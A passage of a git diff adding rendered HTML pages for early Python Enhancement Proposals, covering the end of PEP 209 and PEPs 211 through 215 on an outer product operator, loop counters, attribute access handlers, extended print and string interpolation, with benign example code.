  3. Continue enhancing the UFunc iterator and Array class
      +
    1. Implement some access methods for the Array class: +print, repr, getitem, setitem, etc.
    2. +
    3. Implement multidimensional arrays
    4. +
    5. Implement some of basic Array methods using UFuncs: ++, -, *, /, etc.
    6. +
    7. Enable UFuncs to use Python sequences.
    8. +
    +
  4. +
  5. Complete the standard UFunc and Array class behavior
      +
    1. Implement getslice and setslice behavior
    2. +
    3. Work on Array broadcasting rules
    4. +
    5. Implement Record type
    6. +
    +
  6. +
  7. Add additional functionality
      +
    1. Add more UFuncs
    2. +
    3. Implement buffer or mmap access
    4. +
    +
  8. +
+
+
+

Incompatibilities

+

The following is a list of incompatibilities in behavior between +Numeric 1 and Numeric 2.

+
    +
  1. Scalar coercion rules

    Numeric 1 has single set of coercion rules for array and Python +numeric types. This can cause unexpected and annoying problems +during the calculation of an array expression. Numeric 2 intends +to overcome these problems by having two sets of coercion rules: +one for arrays and Python numeric types, and another just for +arrays.

    +
  2. +
  3. No savespace attribute

    The savespace attribute in Numeric 1 makes arrays with this +attribute set take precedence over those that do not have it set. +Numeric 2 will not have such an attribute and therefore normal +array coercion rules will be in effect.

    +
  4. +
  5. Slicing syntax returns a copy

    The slicing syntax in Numeric 1 returns a view into the original +array. The slicing behavior for Numeric 2 will be a copy. You +should use the ArrayView class to get a view into an array.

    +
  6. +
  7. Boolean comparisons return a boolean array

    A comparison between arrays in Numeric 1 results in a Boolean +scalar, because of current limitations in Python. The advent of +Rich Comparisons in Python 2.1 will allow an array of Booleans to +be returned.

    +
  8. +
  9. Type characters are deprecated

    Numeric 2 will have an ArrayType class composed of Type instances, +for example Int8, Int16, Int32, and Int for signed integers. The +typecode scheme in Numeric 1 will be available for backward +compatibility, but will be deprecated.

    +
  10. +
+
+
+

Appendices

+
    +
  1. Implicit sub-arrays iteration

    A computer animation is composed of a number of 2-D images or +frames of identical shape. By stacking these images into a single +block of memory, a 3-D array is created. Yet the operations to be +performed are not meant for the entire 3-D array, but on the set +of 2-D sub-arrays. In most array languages, each frame has to be +extracted, operated on, and then reinserted into the output array +using a for-like loop. The J language allows the programmer to +perform such operations implicitly by having a rank for the frame +and array. By default these ranks will be the same during the +creation of the array. It was the intention of the Numeric 1 +developers to implement this feature, since it is based on the +language J. The Numeric 1 code has the required variables for +implementing this behavior, but was never implemented. We intend +to implement implicit sub-array iteration in Numeric 2, if the +array broadcasting rules found in Numeric 1 do not fully support +this behavior.

    +
  2. +
+
+ + +
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0209.rst

+

Last modified: 2024-04-14 13:35:25 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0210/index.html b/pep-0210/index.html new file mode 100644 index 00000000000..684746839ac --- /dev/null +++ b/pep-0210/index.html @@ -0,0 +1,122 @@ + + + + + + + + PEP 210 – Decoupling the Interpreter Loop | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+ + +
+ + + + + \ No newline at end of file diff --git a/pep-0211/index.html b/pep-0211/index.html new file mode 100644 index 00000000000..b980ce0b659 --- /dev/null +++ b/pep-0211/index.html @@ -0,0 +1,306 @@ + + + + + + + + PEP 211 – Adding A New Outer Product Operator | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 211 – Adding A New Outer Product Operator

+
+
Author:
+
Greg Wilson <gvwilson at ddj.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
15-Jul-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Warning

+

This PEP has been rejected.

+

×

+

The approach in the later PEP 465 was eventually accepted +in lieu of this PEP. The Rejected Ideas +of that PEP explains the rationale in more detail.

+

+
+
+

Introduction

+

This PEP describes a proposal to define @ (pronounced “across”) +as a new outer product operator in Python 2.2. When applied to +sequences (or other iterable objects), this operator will combine +their iterators, so that:

+
for (i, j) in S @ T:
+    pass
+
+
+

will be equivalent to:

+
for i in S:
+    for j in T:
+        pass
+
+
+

Classes will be able to overload this operator using the special +methods __across__, __racross__, and __iacross__. In +particular, the new Numeric module (PEP 209) will overload this +operator for multi-dimensional arrays to implement matrix +multiplication.

+
+
+

Background

+

Number-crunching is now just a small part of computing, but many +programmers — including many Python users — still need to +express complex mathematical operations in code. Most numerical +languages, such as APL, Fortran-90, MATLAB, IDL, and Mathematica, +therefore provide two forms of the common arithmetic operators. +One form works element-by-element, e.g. multiplies corresponding +elements of its matrix arguments. The other implements the +“mathematical” definition of that operation, e.g. performs +row-column matrix multiplication.

+

Zhu and Lielens have proposed doubling up Python’s operators in +this way. Their proposal would create six new binary infix +operators, and six new in-place operators.

+

The original version of this proposal was much more conservative. +The author consulted the developers of GNU Octave [1], an open +source clone of MATLAB. Its developers agreed that providing an +infix operator for matrix multiplication was important: numerical +programmers really do care whether they have to write mmul(A,B) +instead of A op B.

+

On the other hand, when asked how important it was to have infix +operators for matrix solution and other operations, Prof. James +Rawlings replied [2]:

+
+
I DON’T think it’s a must have, and I do a lot of matrix +inversion. I cannot remember if its A\b or b\A so I always +write inv(A)*b instead. I recommend dropping \.
+

Based on this discussion, and feedback from students at the US +national laboratories and elsewhere, we recommended adding only +one new operator, for matrix multiplication, to Python.

+
+
+

Iterators

+

The planned addition of iterators to Python 2.2 opens up a broader +scope for this proposal. As part of the discussion of PEP 201, +Lockstep Iteration, the author of this proposal conducted an +informal usability experiment [3]. The results showed that users +are psychologically receptive to “cross-product” loop syntax. For +example, most users expected:

+
S = [10, 20, 30]
+T = [1, 2, 3]
+for x in S; y in T:
+    print x+y,
+
+
+

to print 11 12 13 21 22 23 31 32 33. We believe that users will +have the same reaction to:

+
for (x, y) in S @ T:
+    print x+y
+
+
+

i.e. that they will naturally interpret this as a tidy way to +write loop nests.

+

This is where iterators come in. Actually constructing the +cross-product of two (or more) sequences before executing the loop +would be very expensive. On the other hand, @ could be defined +to get its arguments’ iterators, and then create an outer iterator +which returns tuples of the values returned by the inner +iterators.

+
+
+

Discussion

+
    +
  1. Adding a named function “across” would have less impact on +Python than a new infix operator. However, this would not make +Python more appealing to numerical programmers, who really do +care whether they can write matrix multiplication using an +operator, or whether they have to write it as a function call.
  2. +
  3. @ would have be chainable in the same way as comparison +operators, i.e.:
    (1, 2) @ (3, 4) @ (5, 6)
    +
    +
    +

    would have to return (1, 3, 5) ... (2, 4, 6), and not +((1, 3), 5) ... ((2, 4), 6). This should not require special +support from the parser, as the outer iterator created by the +first @ could easily be taught how to combine itself with +ordinary iterators.

    +
  4. +
  5. There would have to be some way to distinguish restartable +iterators from ones that couldn’t be restarted. For example, +if S is an input stream (e.g. a file), and L is a list, then S +@ L is straightforward, but L @ S is not, since iteration +through the stream cannot be repeated. This could be treated +as an error, or by having the outer iterator detect +non-restartable inner iterators and cache their values.
  6. +
  7. Whiteboard testing of this proposal in front of three novice +Python users (all of them experienced programmers) indicates +that users will expect:
    "ab" @ "cd"
    +
    +
    +

    to return four strings, not four tuples of pairs of +characters. Opinion was divided on what:

    +
    ("a", "b") @ "cd"
    +
    +
    +

    ought to return…

    +
  8. +
+
+
+

Alternatives

+
    +
  1. Do nothing — keep Python simple.

    This is always the default choice.

    +
  2. +
  3. Add a named function instead of an operator.

    Python is not primarily a numerical language; it may not be worth +complexifying it for this special case. However, support for real +matrix multiplication is frequently requested, and the proposed +semantics for @ for built-in sequence types would simplify +expression of a very common idiom (nested loops).

    +
  4. +
  5. Introduce prefixed forms of all existing operators, such as +~* and ~+, as proposed in PEP 225.

    Our objections to this are that there isn’t enough demand to +justify the additional complexity (see Rawlings’ comments [2]), +and that the proposed syntax fails the “low toner” readability +test.

    +
  6. +
+
+
+

Acknowledgments

+

I am grateful to Huaiyu Zhu for initiating this discussion, and to +James Rawlings and students in various Python courses for their +discussions of what numerical programmers really care about.

+
+
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0211.rst

+

Last modified: 2024-04-14 20:08:31 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0212/index.html b/pep-0212/index.html new file mode 100644 index 00000000000..d59c618ec36 --- /dev/null +++ b/pep-0212/index.html @@ -0,0 +1,303 @@ + + + + + + + + PEP 212 – Loop Counter Iteration | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 212 – Loop Counter Iteration

+
+
Author:
+
Peter Schneider-Kamp <nowonder at nowonder.de>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
22-Aug-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP has been rejected. enumerate(), introduced in PEP 279, +covers the use-case proposed in this PEP, and the PEP author has been +unreachable.

+
+
+

Introduction

+

This PEP describes the often proposed feature of exposing the loop +counter in for-loops. This PEP tracks the status and ownership of +this feature. It contains a description of the feature and +outlines changes necessary to support the feature. This PEP +summarizes discussions held in mailing list forums, and provides +URLs for further information, where appropriate. The CVS revision +history of this file contains the definitive historical record.

+
+
+

Motivation

+

Standard for-loops in Python iterate over the elements of a +sequence [1]. Often it is desirable to loop over the indices or +both the elements and the indices instead.

+

The common idioms used to accomplish this are unintuitive. This +PEP proposes two different ways of exposing the indices.

+
+
+

Loop counter iteration

+

The current idiom for looping over the indices makes use of the +built-in range function:

+
for i in range(len(sequence)):
+    # work with index i
+
+
+

Looping over both elements and indices can be achieved either by the +old idiom or by using the new zip built-in function [2]:

+
for i in range(len(sequence)):
+    e = sequence[i]
+    # work with index i and element e
+
+
+

or:

+
for i, e in zip(range(len(sequence)), sequence):
+   # work with index i and element e
+
+
+
+
+

The Proposed Solutions

+

There are three solutions that have been discussed. One adds a +non-reserved keyword, the other adds two built-in functions. +A third solution adds methods to sequence objects.

+
+
+

Non-reserved keyword indexing

+

This solution would extend the syntax of the for-loop by adding +an optional <variable> indexing clause which can also be used +instead of the <variable> in clause.

+

Looping over the indices of a sequence would thus become:

+
for i indexing sequence:
+    # work with index i
+
+
+

Looping over both indices and elements would similarly be:

+
for i indexing e in sequence:
+    # work with index i and element e
+
+
+
+
+

Built-in functions indices and irange

+

This solution adds two built-in functions indices and irange. +The semantics of these can be described as follows:

+
def indices(sequence):
+    return range(len(sequence))
+
+def irange(sequence):
+    return zip(range(len(sequence)), sequence)
+
+
+

These functions could be implemented either eagerly or lazily and +should be easy to extend in order to accept more than one sequence +argument.

+

The use of these functions would simplify the idioms for looping +over the indices and over both elements and indices:

+
for i in indices(sequence):
+    # work with index i
+
+for i, e in irange(sequence):
+    # work with index i and element e
+
+
+
+
+

Methods for sequence objects

+

This solution proposes the addition of indices, items +and values methods to sequences, which enable looping over +indices only, both indices and elements, and elements only +respectively.

+

This would immensely simplify the idioms for looping over indices +and for looping over both elements and indices:

+
for i in sequence.indices():
+    # work with index i
+
+for i, e in sequence.items():
+    # work with index i and element e
+
+
+

Additionally it would allow to do looping over the elements +of sequences and dictionaries in a consistent way:

+
for e in sequence_or_dict.values():
+    # do something with element e
+
+
+
+
+

Implementations

+

For all three solutions some more or less rough patches exist +as patches at SourceForge:

+
    +
  • for i indexing a in l: exposing the for-loop counter [3]
  • +
  • add indices() and irange() to built-ins [4]
  • +
  • add items() method to listobject [5]
  • +
+

All of them have been pronounced on and rejected by the BDFL.

+

Note that the indexing keyword is only a NAME in the +grammar and so does not hinder the general use of indexing.

+
+
+

Backward Compatibility Issues

+

As no keywords are added and the semantics of existing code +remains unchanged, all three solutions can be implemented +without breaking existing code.

+
+ +
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0212.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0213/index.html b/pep-0213/index.html new file mode 100644 index 00000000000..2a3ebfc8783 --- /dev/null +++ b/pep-0213/index.html @@ -0,0 +1,352 @@ + + + + + + + + PEP 213 – Attribute Access Handlers | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 213 – Attribute Access Handlers

+
+
Author:
+
Paul Prescod <paul at prescod.net>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
21-Jul-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Introduction

+

It is possible (and even relatively common) in Python code and +in extension modules to “trap” when an instance’s client code +attempts to set an attribute and execute code instead. In other +words, it is possible to allow users to use attribute assignment/ +retrieval/deletion syntax even though the underlying implementation +is doing some computation rather than directly modifying a +binding.

+

This PEP describes a feature that makes it easier, more efficient +and safer to implement these handlers for Python instances.

+
+
+

Justification

+
+

Scenario 1

+

You have a deployed class that works on an attribute named +“stdout”. After a while, you think it would be better to +check that stdout is really an object with a “write” method +at the moment of assignment. Rather than change to a +setstdout method (which would be incompatible with deployed +code) you would rather trap the assignment and check the +object’s type.

+
+
+

Scenario 2

+

You want to be as compatible as possible with an object +model that has a concept of attribute assignment. It could +be the W3C Document Object Model or a particular COM +interface (e.g. the PowerPoint interface). In that case +you may well want attributes in the model to show up as +attributes in the Python interface, even though the +underlying implementation may not use attributes at all.

+
+
+

Scenario 3

+

A user wants to make an attribute read-only.

+

In short, this feature allows programmers to separate the +interface of their module from the underlying implementation +for whatever purpose. Again, this is not a new feature but +merely a new syntax for an existing convention.

+
+
+
+

Current Solution

+

To make some attributes read-only:

+
class foo:
+    def __setattr__( self, name, val ):
+        if name=="readonlyattr":
+            raise TypeError
+        elif name=="readonlyattr2":
+            raise TypeError
+    ...
+    else:
+        self.__dict__["name"]=val
+
+
+

This has the following problems:

+
    +
  1. The creator of the method must be intimately aware of whether +somewhere else in the class hierarchy __setattr__ has also been +trapped for any particular purpose. If so, she must specifically +call that method rather than assigning to the dictionary. There +are many different reasons to overload __setattr__ so there is a +decent potential for clashes. For instance object database +implementations often overload setattr for an entirely unrelated +purpose.
  2. +
  3. The string-based switch statement forces all attribute handlers +to be specified in one place in the code. They may then dispatch +to task-specific methods (for modularity) but this could cause +performance problems.
  4. +
  5. Logic for the setting, getting and deleting must live in +__getattr__, __setattr__ and __delattr__. Once again, this can +be mitigated through an extra level of method call but this is +inefficient.
  6. +
+
+
+

Proposed Syntax

+

Special methods should declare themselves with declarations of the +following form:

+
class x:
+    def __attr_XXX__(self, op, val ):
+        if op=="get":
+            return someComputedValue(self.internal)
+        elif op=="set":
+            self.internal=someComputedValue(val)
+        elif op=="del":
+            del self.internal
+
+
+

Client code looks like this:

+
fooval=x.foo
+x.foo=fooval+5
+del x.foo
+
+
+
+
+

Semantics

+

Attribute references of all three kinds should call the method. +The op parameter can be “get”/”set”/”del”. Of course this string +will be interned so the actual checks for the string will be +very fast.

+

It is disallowed to actually have an attribute named XXX in the +same instance as a method named __attr_XXX__.

+

An implementation of __attr_XXX__ takes precedence over an +implementation of __getattr__ based on the principle that +__getattr__ is supposed to be invoked only after finding an +appropriate attribute has failed.

+

An implementation of __attr_XXX__ takes precedence over an +implementation of __setattr__ in order to be consistent. The +opposite choice seems fairly feasible also, however. The same +goes for __del_y__.

+
+
+

Proposed Implementation

+

There is a new object type called an attribute access handler. +Objects of this type have the following attributes:

+
name (e.g. XXX, not __attr__XXX__)
+method (pointer to a method object)
+
+
+

In PyClass_New, methods of the appropriate form will be detected and +converted into objects (just like unbound method objects). These are +stored in the class __dict__ under the name XXX. The original method +is stored as an unbound method under its original name.

+

If there are any attribute access handlers in an instance at all, +a flag is set. Let’s call it “I_have_computed_attributes” for +now. Derived classes inherit the flag from base classes. Instances +inherit the flag from classes.

+

A get proceeds as usual until just before the object is returned. +In addition to the current check whether the returned object is a +method it would also check whether a returned object is an access +handler. If so, it would invoke the getter method and return +the value. To remove an attribute access handler you could directly +fiddle with the dictionary.

+

A set proceeds by checking the “I_have_computed_attributes” flag. If +it is not set, everything proceeds as it does today. If it is set +then we must do a dictionary get on the requested object name. If it +returns an attribute access handler then we call the setter function +with the value. If it returns any other object then we discard the +result and continue as we do today. Note that having an attribute +access handler will mildly affect attribute “setting” performance for +all sets on a particular instance, but no more so than today, using +__setattr__. Gets are more efficient than they are today with +__getattr__.

+

The I_have_computed_attributes flag is intended to eliminate the +performance degradation of an extra “get” per “set” for objects not +using this feature. Checking this flag should have minuscule +performance implications for all objects.

+

The implementation of delete is analogous to the implementation +of set.

+
+
+

Caveats

+
    +
  1. You might note that I have not proposed any logic to keep +the I_have_computed_attributes flag up to date as attributes +are added and removed from the instance’s dictionary. This is +consistent with current Python. If you add a __setattr__ method +to an object after it is in use, that method will not behave as +it would if it were available at “compile” time. The dynamism is +arguably not worth the extra implementation effort. This snippet +demonstrates the current behavior:
    >>> def prn(*args):print args
    +>>> class a:
    +
    +...    __setattr__=prn
    +>>> a().foo=5
    +(<__main__.a instance at 882890>, 'foo', 5)
    +
    +>>> class b: pass
    +>>> bi=b()
    +>>> bi.__setattr__=prn
    +>>> b.foo=5
    +
    +
    +
  2. +
  3. Assignment to __dict__[“XXX”] can overwrite the attribute +access handler for __attr_XXX__. Typically the access handlers will +store information away in private __XXX variables
  4. +
  5. An attribute access handler that attempts to call setattr or getattr +on the object itself can cause an infinite loop (as with __getattr__) +Once again, the solution is to use a special (typically private) +variable such as __XXX.
  6. +
+
+
+

Note

+

The descriptor mechanism described in PEP 252 is powerful enough +to support this more directly. A ‘getset’ constructor may be +added to the language making this possible:

+
class C:
+    def get_x(self):
+        return self.__x
+    def set_x(self, v):
+        self.__x = v
+    x = getset(get_x, set_x)
+
+
+

Additional syntactic sugar might be added, or a naming convention +could be recognized.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0213.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0214/index.html b/pep-0214/index.html new file mode 100644 index 00000000000..7f74b4b78ba --- /dev/null +++ b/pep-0214/index.html @@ -0,0 +1,470 @@ + + + + + + + + PEP 214 – Extended Print Statement | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 214 – Extended Print Statement

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
24-Jul-2000
+
Python-Version:
+
2.0
+
Post-History:
+
16-Aug-2000
+
+
+
+
Table of Contents +
+
+

Introduction

+

This PEP describes a syntax to extend the standard ‘print’ +statement so that it can be used to print to any file-like object, +instead of the default sys.stdout. This PEP tracks the status and +ownership of this feature. It contains a description of the +feature and outlines changes necessary to support the feature. +This PEP summarizes discussions held in mailing list forums, and +provides URLs for further information, where appropriate. The CVS +revision history of this file contains the definitive historical +record.

+
+
+

Proposal

+

This proposal introduces a syntax extension to the print +statement, which allows the programmer to optionally specify the +output file target. An example usage is as follows:

+
print >> mylogfile, 'this message goes to my log file'
+
+
+

Formally, the syntax of the extended print statement is:

+
print_stmt: ... | '>>' test [ (',' test)+ [','] ] )
+
+
+

where the ellipsis indicates the original print_stmt syntax +unchanged. In the extended form, the expression just after >> +must yield an object with a write() method (i.e. a file-like +object). Thus these two statements are equivalent:

+
print 'hello world'
+print >> sys.stdout, 'hello world'
+
+
+

As are these two statements:

+
print
+print >> sys.stdout
+
+
+

These two statements are syntax errors:

+
print ,
+print >> sys.stdout,
+
+
+
+
+

Justification

+

‘print’ is a Python keyword and introduces the print statement as +described in section 6.6 of the language reference manual [1]. +The print statement has a number of features:

+
    +
  • it auto-converts the items to strings
  • +
  • it inserts spaces between items automatically
  • +
  • it appends a newline unless the statement ends in a comma
  • +
+

The formatting that the print statement performs is limited; for +more control over the output, a combination of sys.stdout.write(), +and string interpolation can be used.

+

The print statement by definition outputs to sys.stdout. More +specifically, sys.stdout must be a file-like object with a write() +method, but it can be rebound to redirect output to files other +than specifically standard output. A typical idiom is:

+
save_stdout = sys.stdout
+try:
+    sys.stdout = mylogfile
+    print 'this message goes to my log file'
+finally:
+    sys.stdout = save_stdout
+
+
+

The problem with this approach is that the binding is global, and +so affects every statement inside the try: clause. For example, +if we added a call to a function that actually did want to print +to stdout, this output too would get redirected to the logfile.

+

This approach is also very inconvenient for interleaving prints to +various output streams, and complicates coding in the face of +legitimate try/except or try/finally clauses.

+
+
+

Reference Implementation

+

A reference implementation, in the form of a patch against the +Python 2.0 source tree, is available on SourceForge’s patch +manager [2]. This approach adds two new opcodes, PRINT_ITEM_TO and +PRINT_NEWLINE_TO, which simply pop the file like object off the +top of the stack and use it instead of sys.stdout as the output +stream.

+

(This reference implementation has been adopted in Python 2.0.)

+
+
+

Alternative Approaches

+

An alternative to this syntax change has been proposed (originally +by Moshe Zadka) which requires no syntax changes to Python. A +writeln() function could be provided (possibly as a builtin), that +would act much like extended print, with a few additional +features:

+
def writeln(*args, **kws):
+    import sys
+    file = sys.stdout
+    sep = ' '
+    end = '\n'
+    if kws.has_key('file'):
+        file = kws['file']
+        del kws['file']
+    if kws.has_key('nl'):
+        if not kws['nl']:
+            end = ' '
+        del kws['nl']
+    if kws.has_key('sep'):
+        sep = kws['sep']
+        del kws['sep']
+    if kws:
+        raise TypeError('unexpected keywords')
+    file.write(sep.join(map(str, args)) + end)
+
+
+

writeln() takes a three optional keyword arguments. In the +context of this proposal, the relevant argument is ‘file’ which +can be set to a file-like object with a write() method. Thus:

+
print >> mylogfile, 'this goes to my log file'
+
+
+

would be written as:

+
writeln('this goes to my log file', file=mylogfile)
+
+
+

writeln() has the additional functionality that the keyword +argument ‘nl’ is a flag specifying whether to append a newline or +not, and an argument ‘sep’ which specifies the separator to output +in between each item.

+
+
+

More Justification by the BDFL

+

The proposal has been challenged on the newsgroup. One series of +challenges doesn’t like ‘>>’ and would rather see some other +symbol.

+
    +
  • Challenge: Why not one of these?
    print in stderr items,....
    +print + stderr items,.......
    +print[stderr] items,.....
    +print to stderr items,.....
    +
    +
    +

    Response: If we want to use a special symbol (print <symbol> +expression), the Python parser requires that it is not already a +symbol that can start an expression – otherwise it can’t decide +which form of print statement is used. (The Python parser is a +simple LL(1) or recursive descent parser.)

    +

    This means that we can’t use the “keyword only in context trick” +that was used for “import as”, because an identifier can start an +expression. This rules out +stderr, [sterr], and to stderr. It +leaves us with binary operator symbols and other miscellaneous +symbols that are currently illegal here, such as ‘import’.

    +

    If I had to choose between ‘print in file’ and ‘print >> file’ I +would definitely choose ‘>>’. In part because ‘in’ would be a new +invention (I know of no other language that uses it, while ‘>>’ is +used in sh, awk, Perl, and C++), in part because ‘>>’, being +non-alphabetic, stands out more so is more likely to catch the +reader’s attention.

    +
  • +
  • Challenge: Why does there have to be a comma between the file and +the rest?

    Response: The comma separating the file from the following expression is +necessary! Of course you want the file to be an arbitrary +expression, not just a single word. (You definitely want to be +able to write print >>sys.stderr.) Without the expression the +parser wouldn’t be able to distinguish where that expression ends +and where the next one begins, e.g.

    +
    print >>i +1, 2
    +print >>a [1], 2
    +print >>f (1), 2
    +
    +
    +
  • +
  • Challenge: Why do you need a syntax extension? Why not +writeln(file, item, …)?

    Response: First of all, this is lacking a feature of the print +statement: the trailing comma to print which suppresses the final +newline. Note that ‘print a,’ still isn’t equivalent to +‘sys.stdout.write(a)’ – print inserts a space between items, and +takes arbitrary objects as arguments; write() doesn’t insert a +space and requires a single string.

    +

    When you are considering an extension for the print statement, +it’s not right to add a function or method that adds a new feature +in one dimension (where the output goes) but takes away in another +dimension (spaces between items, and the choice of trailing +newline or not). We could add a whole slew of methods or +functions to deal with the various cases but that seems to add +more confusion than necessary, and would only make sense if we +were to deprecate the print statement altogether.

    +

    I feel that this debate is really about whether print should have +been a function or method rather than a statement. If you are in +the function camp, of course adding special syntax to the existing +print statement is not something you like. I suspect the +objection to the new syntax comes mostly from people who already +think that the print statement was a bad idea. Am I right?

    +

    About 10 years ago I debated with myself whether to make the most +basic from of output a function or a statement; basically I was +trying to decide between “print(item, …)” and “print item, …”. +I chose to make it a statement because printing needs to be taught +very early on, and is very important in the programs that +beginners write. Also, because ABC, which lead the way for so +many things, made it a statement. In a move that’s typical for +the interaction between ABC and Python, I changed the name from +WRITE to print, and reversed the convention for adding newlines +from requiring extra syntax to add a newline (ABC used trailing +slashes to indicate newlines) to requiring extra syntax (the +trailing comma) to suppress the newline. I kept the feature that +items are separated by whitespace on output.

    +

    Full example: in ABC,

    +
    WRITE 1
    +WRITE 2/
    +
    +
    +

    has the same effect as:

    +
    print 1,
    +print 2
    +
    +
    +

    has in Python, outputting in effect “1 2n”.

    +

    I’m not 100% sure that the choice for a statement was right (ABC +had the compelling reason that it used statement syntax for +anything with side effects, but Python doesn’t have this +convention), but I’m also not convinced that it’s wrong. I +certainly like the economy of the print statement. (I’m a rabid +Lisp-hater – syntax-wise, not semantics-wise! – and excessive +parentheses in syntax annoy me. Don’t ever write return(i) or +if(x==y): in your Python code! :-)

    +

    Anyway, I’m not ready to deprecate the print statement, and over +the years we’ve had many requests for an option to specify the +file.

    +
  • +
  • Challenge: Why not > instead of >>?

    Response: To DOS and Unix users, >> suggests “append”, while > +suggests “overwrite”; the semantics are closest to append. Also, +for C++ programmers, >> and << are I/O operators.

    +
  • +
  • Challenge: But in C++, >> is input and << is output!

    Response: doesn’t matter; C++ clearly took it from Unix and +reversed the arrows. The important thing is that for output, the +arrow points to the file.

    +
  • +
  • Challenge: Surely you can design a println() function can do all +what print>>file can do; why isn’t that enough?

    Response: I think of this in terms of a simple programming +exercise. Suppose a beginning programmer is asked to write a +function that prints the tables of multiplication. A reasonable +solution is:

    +
    def tables(n):
    +    for j in range(1, n+1):
    +        for i in range(1, n+1):
    +            print i, 'x', j, '=', i*j
    +        print
    +
    +
    +

    Now suppose the second exercise is to add printing to a different +file. With the new syntax, the programmer only needs to learn one +new thing: print >> file, and the answer can be like this:

    +
    def tables(n, file=sys.stdout):
    +    for j in range(1, n+1):
    +        for i in range(1, n+1):
    +            print >> file, i, 'x', j, '=', i*j
    +        print >> file
    +
    +
    +

    With only a print statement and a println() function, the +programmer first has to learn about println(), transforming the +original program to using println():

    +
    def tables(n):
    +    for j in range(1, n+1):
    +        for i in range(1, n+1):
    +            println(i, 'x', j, '=', i*j)
    +        println()
    +
    +
    +

    and then about the file keyword argument:

    +
    def tables(n, file=sys.stdout):
    +    for j in range(1, n+1):
    +        for i in range(1, n+1):
    +            println(i, 'x', j, '=', i*j, file=sys.stdout)
    +        println(file=sys.stdout)
    +
    +
    +

    Thus, the transformation path is longer:

    +
    (1) print
    +(2) print >> file
    +
    +
    +

    vs.

    +
    (1) print
    +(2) println()
    +(3) println(file=...)
    +
    +
    +

    Note: defaulting the file argument to sys.stdout at compile time +is wrong, because it doesn’t work right when the caller assigns to +sys.stdout and then uses tables() without specifying the file. +This is a common problem (and would occur with a println() +function too). The standard solution so far has been:

    +
    def tables(n, file=None):
    +    if file is None:
    +        file = sys.stdout
    +    for j in range(1, n+1):
    +        for i in range(1, n+1):
    +            print >> file, i, 'x', j, '=', i*j
    +        print >> file
    +
    +
    +

    I’ve added a feature to the implementation (which I would also +recommend to println()) whereby if the file argument is None, +sys.stdout is automatically used. Thus,

    +
    print >> None, foo bar
    +
    +
    +

    (or, of course, print >> x where x is a variable whose value is +None) means the same as

    +
    print foo, bar
    +
    +
    +

    and the tables() function can be written as follows:

    +
    def tables(n, file=None):
    +    for j in range(1, n+1):
    +        for i in range(1, n+1):
    +            print >> file, i, 'x', j, '=', i*j
    +        print >> file
    +
    +
    +
  • +
+
+
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0214.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0215/index.html b/pep-0215/index.html new file mode 100644 index 00000000000..edbf5909989 --- /dev/null +++ b/pep-0215/index.html @@ -0,0 +1,268 @@ + + + + + + + + PEP 215 – String Interpolation | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 215 – String Interpolation

+
+
Author:
+
Ka-Ping Yee <ping at zesty.ca>
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Created:
+
24-Jul-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
Superseded-By:
+
292
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP has been superseded by PEP 292.

+

×

+

+
+
+

Abstract

+

This document proposes a string interpolation feature for Python +to allow easier string formatting. The suggested syntax change +is the introduction of a ‘$’ prefix that triggers the special +interpretation of the ‘$’ character within a string, in a manner +reminiscent to the variable interpolation found in Unix shells, +awk, Perl, or Tcl.

+
+ +
+

Specification

+

Strings may be preceded with a ‘$’ prefix that comes before the +leading single or double quotation mark (or triplet) and before +any of the other string prefixes (‘r’ or ‘u’). Such a string is +processed for interpolation after the normal interpretation of +backslash-escapes in its contents. The processing occurs just +before the string is pushed onto the value stack, each time the +string is pushed. In short, Python behaves exactly as if ‘$’ +were a unary operator applied to the string. The operation +performed is as follows:

+

